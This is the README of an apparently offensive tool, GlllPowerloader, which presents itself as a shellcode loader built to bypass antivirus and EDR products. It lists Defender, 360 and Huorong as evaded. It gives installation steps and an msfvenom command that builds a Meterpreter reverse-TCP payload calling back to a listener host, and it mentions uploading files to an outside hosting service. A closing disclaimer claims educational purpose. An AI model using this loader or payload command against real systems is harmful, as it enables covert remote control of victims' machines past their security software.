绕过AV/EDR的代码例子(Code example to bypass AV/EDR)
功能 | 描述 |
---|---|
1.免杀加载器 | 各种方式加载shellcode,绕过AV/EDR |
2.文件格式转换 | Windows中文件格式之间的转换 |
3.自动化文件托管 | 将文件托管到:https://transfer.sh/ |
您必须下载并安装以下环境:
1.Mingw64(C/C++):https://github.com/niXman/mingw-builds-binaries/releases/download/12.2.0-rt_v10-rev2/x86_64-12.2.0-release-posix-seh-msvcrt-rt_v10-rev2.7z
解压完以后,将bin目录添加至环境变 量即可
使用Git下载项目
git clone https://github.com/INotGreen/GlllPowerloader.git
cd GlllPowerLoader-master
pip install -r requirements.txt
start.bat
Metasploit:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.0 LPORT=4488 -f raw -o payload.bin
[+] 2022年12.21,Powerloader发布
[+]2023 年11.15, 删除冗余的功能,优化代码,(之前的版本涉及语言安装环境太多了,使用太麻烦,为了简便就留C/C++的加载器)
[+]2023年11.20,免杀defender,360,火绒(前提是shellcode内存是没有被标记的)
免杀加载器正在更新中。。。
该工具仅用于网络安全教育和研究,禁止用于非法途径,我对您由使用或传播等由此软件引起的任何行为和/或损害不承担任何责任。您对使用此软件的任何行为承担全部责任,并承认此软件仅用于教育和研究目的。下载本软件或软件的源代码,您自动同意上述内容。